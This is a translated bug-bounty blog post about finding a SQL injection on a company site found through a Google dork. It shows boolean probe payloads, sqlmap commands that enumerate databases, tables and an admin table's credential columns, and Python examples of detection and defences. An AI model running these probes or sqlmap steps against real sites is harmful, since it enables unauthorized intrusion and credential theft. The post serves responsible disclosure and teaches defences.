Notes from my vulnerability hunting practice: a SQL injection vulnerability at a company

Table of contents

I. Introduction

II. Mining process

1. Random search with a Google dork

2. Entering the website

3. Injection point detection

III. SQLMAP enumeration

(1) Enumerating databases

(2) Enumerating tables

(3) Enumerating columns

IV. Summary


I. Introduction

I submitted the vulnerability on Vulbox (漏洞盒子), which runs a project called public-welfare SRC (公益SRC). Public-welfare SRC is a platform where white hats submit vulnerabilities they come across by chance; we can submit on Vulbox both the vulnerabilities we stumbled on and the ones we found by actively looking. Do not cross the red line when hunting for an SRC. In general, for SQL injection you only need to obtain the database name to prove the vulnerability exists; it is best not to go any further. For an XSS vulnerability, only obtain information such as your own cookie or IP to prove it exists. For information leakage, if sensitive files can be downloaded, the files must be deleted once the vulnerability is confirmed.

II. Mining process

1. Random search with a Google dork

inurl:php?id=1

Many readers will be familiar with this Google dork; it is a classic one for finding sites that may have SQL injection vulnerabilities, because it matches PHP pages that take an id parameter straight from the query string.

If you want to use Google, look for circumvention (翻墙) software or the like. If you cannot find any, the search engine built into the Edge browser that ships with Windows 11 (Bing) also supports the inurl: operator, so you can try it there.

2. Entering the website

For convenience I copied the URL into Firefox. You can see the id parameter at the end of the URL. When hunting for vulnerabilities you should be alert whenever you see a parameter like this, because a page that takes an id from the query string is a prime candidate for injection. A second observation is that the parameter is passed with GET, so it shows up in the URL bar, browser history, proxy and web server logs and Referer headers; that is why, in practice, POST is the better choice for transmitting data and the direct exposure of information should be kept to a minimum. Note, though, that switching to POST does not by itself stop SQL injection: the query is just as injectable, it is only harder to spot from the URL bar.

3. Injection point detection

For convenience, I put the URL into HackBar (a Firefox extension for editing and resending requests).

After entering the following parameter, I found that a picture at the bottom of the website went missing, so I kept testing:

id=1'

After entering the following parameter, the page returned to normal (for confidentiality, the screenshot is blurred):

id=1'and'1'='1

Entering the following parameter makes the picture break again. This is a textbook character-type (string-context) SQL injection: the quote closes the string literal in the query, and whatever condition is appended decides whether the row comes back.

id=1'and'1'='2
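The three manual probes above, reproduced offline as an added example that is not code from the original post. The table, its rows and the `vulnerable_lookup` handler are constructed for illustration on SQLite; the real site's query is not known. It shows why the lone quote, the always-true condition and the always-false condition behave as described, and wraps that comparison into a `probe_string_injection` function that can be pointed at any lookup callable.

```python
import sqlite3

# Constructed sample table standing in for the target site's data.
# `id` is a TEXT column so the quoted id in the query is a genuine string
# context, the "character-type" injection the page describes.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE news (id TEXT PRIMARY KEY, title TEXT, image TEXT)")
_conn.executemany(
    "INSERT INTO news VALUES (?, ?, ?)",
    [("1", "Welcome", "banner1.jpg"), ("2", "Products", "banner2.jpg")],
)


def vulnerable_lookup(raw_id: str) -> str:
    """Hypothetical page handler with the bug: the id from the query string is
    pasted into a quoted literal. Returns the image filename the page would
    render, or "" when the query fails or matches nothing, which is the
    'picture at the bottom is missing' symptom seen in the manual test."""
    sql = f"SELECT image FROM news WHERE id = '{raw_id}'"
    try:
        row = _conn.execute(sql).fetchone()
    except sqlite3.Error:  # the stray quote leaves an unterminated string
        return ""
    return row[0] if row else ""


# Suffixes appended to a known-good id, exactly as in the manual test above.
PROBES = {
    "quote": "'",
    "true": "'and'1'='1",
    "false": "'and'1'='2",
}


def probe_string_injection(lookup, base_id: str = "1"):
    """Boolean-based detection in the same order as the manual steps: a lone
    quote must break the page, an always-true condition must restore the
    original response, and an always-false condition must break it again.
    `lookup` is any callable mapping an id string to the page marker being
    compared (here the image filename; against a live site compare a stable
    fragment of the body, not the whole response, which may carry timestamps
    or nonces that differ on every request). Returns (verdict, observations)."""
    baseline = lookup(base_id)
    seen = {name: lookup(base_id + suffix) for name, suffix in PROBES.items()}
    injectable = (
        baseline != ""                 # page works for the plain id
        and seen["quote"] != baseline  # a lone quote breaks the query
        and seen["true"] == baseline   # always-true condition restores it
        and seen["false"] != baseline  # always-false condition breaks it
    )
    return injectable, seen


if __name__ == "__main__":
    verdict, seen = probe_string_injection(vulnerable_lookup)
    print("string-context injection:", verdict, seen)
```

The verdict requires all three observations to line up; a page that merely errors on a quote (for example because of a WAF) will fail the "true restores it" step and is not reported as injectable by this check alone.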

III. SQLMAP enumeration

Why use sqlmap? First, efficiency: it is an automated tool that enumerates database information far faster than doing it by hand. Second, I had tried manual injection earlier and could not extract much, so I switched to sqlmap.

In fact, sqlmap's initial fingerprinting output already tells you the injection types it found on this site, the web server's operating system, the back-end language and the DBMS version.

(1) Enumerating databases

You can see that the company currently has 5 databases visible to the injected user. To protect the company's privacy, all of them are redacted except information_schema.

Also, when you are hunting for vulnerabilities, I personally suggest leaving the information_schema database alone: the key information of the entire database is stored in it, and we cannot bear the responsibility if something goes wrong.

sqlmap -u URL --dbs

(2) Enumerating tables

sqlmap -u URL --tables -D <database_name>

Here I picked one of the databases they had named themselves, and when I enumerated it an admin table popped up. At that point I guessed that usernames and passwords must be stored in it.


(3) Enumerating columns

sqlmap -u URL --columns -T <table_name> -D <database_name>

As expected, enumerating the columns turned up two fields, account and userpass, which probably hold the user name and password (just a guess; I dared not go any further). For safety, the company's and my own, I decided to stop there and filed a vulnerability report on the SRC.


IV. Summary

SQL injection is a common problem, and there are many ways to defend against it:

1. Use parameterized queries: parameterized queries prevent SQL injection. The SQL statement and the parameters are sent to the database separately instead of being combined into one string, which guarantees that a parameter can never be interpreted as SQL code.

2. Validate and filter input: validate and filter user input before it is passed to the database. A regular expression or similar check can confirm that the input matches the expected format, and unnecessary characters such as single and double quotes can be filtered out. Stripping quotes is no substitute for point 1, though: in a numeric context such as id=1 and 1=2 no quote is needed at all, so an allowlist of what the parameter may look like (for example, only digits for an id) is far safer than a blocklist of characters.

3. Minimise database privileges: restrict the database user to the smallest set of rights it needs, only the operations the application actually performs. This reduces what an attacker can do with an injection if one is found.

4. Never trust user input!

and so on.
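The three mitigations above applied to the same kind of id lookup, as an added example that is not from the original post. The table, the `safe_lookup` handler and the use of SQLite's `query_only` pragma to stand in for a read-only database account are constructed for illustration; on a real DBMS the equivalent of the last one is a dedicated account granted only SELECT on the tables the page needs.

```python
import re
import sqlite3

# Constructed sample table; the TEXT id keeps the same quoted-string context
# that was injectable in the manual test.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE news (id TEXT PRIMARY KEY, title TEXT, image TEXT)")
_conn.executemany(
    "INSERT INTO news VALUES (?, ?, ?)",
    [("1", "Welcome", "banner1.jpg"), ("2", "Products", "banner2.jpg")],
)
_conn.commit()

# Mitigation 3, least privilege, as far as a single SQLite connection can
# model it: from here on this connection refuses every write, so even a
# successful injection could at worst read. With MySQL or PostgreSQL this is
# a separate account that only has SELECT on the tables the page needs.
_conn.execute("PRAGMA query_only = 1")

# Mitigation 2, allowlist validation: an id is a short decimal number and
# nothing else. Anything with a quote, a space or a keyword never reaches SQL.
ID_PATTERN = re.compile(r"[0-9]{1,10}")


def safe_lookup(raw_id: str, validate: bool = True) -> str:
    """Hardened handler. Mitigation 1: the query text never changes; the id
    travels as a bound parameter, so a quote or an appended condition is
    compared as data rather than parsed as SQL. `validate=False` exists only
    to demonstrate that parameter binding holds on its own, as defence in
    depth should a validation step ever be bypassed."""
    if validate and not ID_PATTERN.fullmatch(raw_id):
        raise ValueError("id must be a decimal number")
    row = _conn.execute("SELECT image FROM news WHERE id = ?", (raw_id,)).fetchone()
    return row[0] if row else ""


def write_is_blocked() -> bool:
    """True when the read-only setting stops a data change, i.e. what an
    attacker who did obtain injection on this connection would run into."""
    try:
        _conn.execute("UPDATE news SET image = 'pwned.jpg' WHERE id = '1'")
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    print(safe_lookup("1"))                              # banner1.jpg
    print(safe_lookup("1'and'1'='1", validate=False))    # "" (no such id)
    print("writes blocked:", write_is_blocked())          # True
```

With validation on, the payloads from the manual test are rejected before any query runs; with it off, the bound parameter means `1'and'1'='1` is simply looked up as a literal id and finds nothing, which is the behaviour that makes parameterization the primary control.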

When hunting for bugs, everyone should also be careful: some of what you dig up is very sensitive information. Do not spread it around or use it at will, otherwise the nature of the whole thing changes. And remember to submit the vulnerability report promptly. Be an upstanding white hat!

This is the first time I have written this kind of hands-on article; please point out the bad parts!


Source: blog.csdn.net/qq_60503432/article/details/130465208